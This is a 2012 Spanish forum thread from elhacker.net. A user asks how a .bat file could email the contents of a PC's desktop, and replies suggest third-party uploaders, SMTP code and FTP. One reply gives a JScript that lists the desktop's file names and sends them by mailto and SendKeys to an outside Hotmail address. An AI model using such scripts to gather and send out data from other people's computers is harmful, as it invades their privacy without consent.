elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  copiar y enviar datos .bat???
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: copiar y enviar datos .bat???  (Leído 4,476 veces)
nb248077

Desconectado Desconectado

Mensajes: 18


Ver Perfil
copiar y enviar datos .bat???
« en: 8 Diciembre 2012, 17:08 pm »

no se si se puede... por eso mi tema...

es posible crear algun tipo de programa .bat en el que envie por correo lo que ay en el escritorio de una pc???

si es asi... me podriais informar de como crear-lo??


En línea

tmb90

Desconectado Desconectado

Mensajes: 35


Ver Perfil
Re: copiar y enviar datos .bat???
« Respuesta #1 en: 9 Diciembre 2012, 09:00 am »

Para poder enviar datos y copiarlos con batch tenes que instalarte algo como una extension de codigo de BATCH.
 No se mucho mas del tema porque prefiero manejarme con el codigo que tiene por defecto windows, o si usas un emulador en otro SO los comandos predefinidos que tenga.


En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.809



Ver Perfil
Re: copiar y enviar datos .bat???
« Respuesta #2 en: 9 Diciembre 2012, 18:52 pm »

Batch no dispone de ningún comando nativo para enviar e-mails... tienes que usar aplicaciones de terceros, como por ejemplo Zetauploader (Pero la versión CommandLine), es de lo mejor que existe y gratis.

PD: O usa cualquier otro lenguaje que no séa Batch para enviar emails sin necesidad de usar otro software.

Citar
ZETA UPLOADER CONSOLE version 2.1.0.35
Application to upload files and folders through the Zeta Uploader service.

See https://www.zeta-uploader.com for more information

Usage:
        zulc.exe
                -help
                -path="<file path or folder path>"
                -excludes="<semicolon-separated list of exclude sub strings. Can be file to read from. Optional>"
                -receivers="<receiver e-mail addresses, semicolon-separated. Can be file to read from. Optional>"
                -remarks="<additional remarks for the receivers. Can be file toread from. Optional>"
                -language="de|en|tr"
                -subject="<subject of the generated e-mail message. Can be fileto read from. Optional>"

Return values:
        -1 : An error has occurred.
        0 : Everything worked correctly.

Example (write in a single line when using):
        zulc.exe
                -path="c:\my\folder\to\send"
                -excludes=".obj;.exe;\subfolder\;file.;.txt"

Remarks:
        If a folder is being sent, the content of the folder are being compressed to one file before sending.


Saludos.
« Última modificación: 9 Diciembre 2012, 18:53 pm por EleKtro H@cker » En línea

nb248077

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: copiar y enviar datos .bat???
« Respuesta #3 en: 10 Diciembre 2012, 20:58 pm »

no se mucho de programación... pero lo que mas he tocado es c++... con ese se podría hacer???
En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.809



Ver Perfil
Re: copiar y enviar datos .bat???
« Respuesta #4 en: 10 Diciembre 2012, 21:09 pm »

c++... con ese se podría hacer???

http://stackoverflow.com/questions/58210/c-smtp-example

https://www.google.com/search?q=send+smtp+email+c%2B%2B&ie=utf-8&oe=utf-8&lr=lang_en

PD: Espera la respuesta del compañero, amo y señor de C#, Novlucker  :xD
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: copiar y enviar datos .bat???
« Respuesta #5 en: 10 Diciembre 2012, 21:16 pm »

No iba a responder, pero como me llamaron :xD

En C# es muy sencillo, o en VB.NET también sería muy similar ...
http://foro.elhacker.net/net/mandar_correo_con_c_y_smtp_de_gmail-t316258.0.html
Solo necesitas bajar Visual Studio Express para comenzar a probar un poco más que BATCH :P

Saludos

En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
nolo2

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: copiar y enviar datos .bat???
« Respuesta #6 en: 10 Diciembre 2012, 23:28 pm »

Estoy seguro que hay alguna forma de meterle mano con un script pero no se lo suficiente.
Con esto en un .js se abre el progrma de correo asociado. Por lo menos mi windowsMail y no se si usando sendkey se puede mandar algo o sería necesario abrir el programa como un objeto application.
Código:
var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run ("Mailto:desconocido@hotmail.com",0,false)
A ver si algún entendido nos puede contar algo.....
Suerte ¡¡¡ ;D
En línea

nolo2

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: copiar y enviar datos .bat???
« Respuesta #7 en: 12 Diciembre 2012, 23:54 pm »

Bueno, no hay ningún entendido colaborador ¡¡¡ :-(
Explorando el escritorio como una carpeta con la "famosa función ShowFolderFileList" de las ayudas, a mi me funciona este .js
Código:
////// By Nolo2 Nov 2012 ////////////////////////////////
// buscar lo que hay en el escritorio
var WshShell = new ActiveXObject("WScript.Shell");
var escritorio = WshShell.SpecialFolders("Desktop");
var archivos = ShowFolderFileList(escritorio);
var listaDeArchivos = archivos.split("\n");

// llamar al correo
var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run ("Mailto:desconocido@hotmail.com",1,false);
WScript.Sleep (3000);
WSHShell.SendKeys("privado~");
WScript.Sleep (200);
WSHShell.SendKeys("~");
WSHShell.SendKeys("Listado:~");
// poner en el mensaje lo que hay en el escritorio
for (i = 0; i < listaDeArchivos.length ; i++) {
WScript.Sleep (100);
WSHShell.SendKeys("~");
WSHShell.SendKeys(listaDeArchivos[i]);
}
// mandar el mensaje
WSHShell.SendKeys("+%E");
WScript.Echo ("     FINALIZADO");

function ShowFolderFileList(folderspec)
{
  var fso, f, f1, fc, s;
  fso = new ActiveXObject("Scripting.FileSystemObject");
  f = fso.GetFolder(folderspec);
  fc = new Enumerator(f.files);
  s = "";
  num_f = 0;
  for (; !fc.atEnd(); fc.moveNext()){;
    s += fc.item().Name;
   num_f =num_f + 1;
   s += "\n";
  }
  return(s);
}
Hasta aqui he llegado ;D  Suerte ¡¡¡
En línea

Meine programmen

Desconectado Desconectado

Mensajes: 121



Ver Perfil
Re: copiar y enviar datos .bat???
« Respuesta #8 en: 16 Diciembre 2012, 21:27 pm »

Por ftp seria bastante mas facil que por correo. Convierte el ordenador receptor en un servidor ftp de uso propio.
En línea

REMEMBER! Reality is an illusion, the universe is a hologram, BUY GOLD! BYE!!

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como enviar los datos a la Base de Datos « 1 2 »
PHP
giagete 17 7,300 Último mensaje 7 Septiembre 2007, 16:06 pm
por JUCA
Enviar Ctrl+c a una ventana de windows para copiar un texto seleccionado
.NET (C#, VB.NET, ASP)
arenoide 3 5,585 Último mensaje 16 Agosto 2011, 00:55 am
por Meta
copiar datos de cD
Dudas Generales
piopioguauguau 2 3,281 Último mensaje 31 Octubre 2011, 18:34 pm
por piopioguauguau
Enviar y Solicitar datos en Base de Datos mediante Winsock?
Programación Visual Basic
Brian1511 0 2,092 Último mensaje 25 Noviembre 2012, 18:42 pm
por Brian1511
Cómo enviar (copiar) unos files.dll a System32 en Windows7
Scripting
Rumaca 5 5,192 Último mensaje 16 Octubre 2016, 19:34 pm
por Rumaca
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines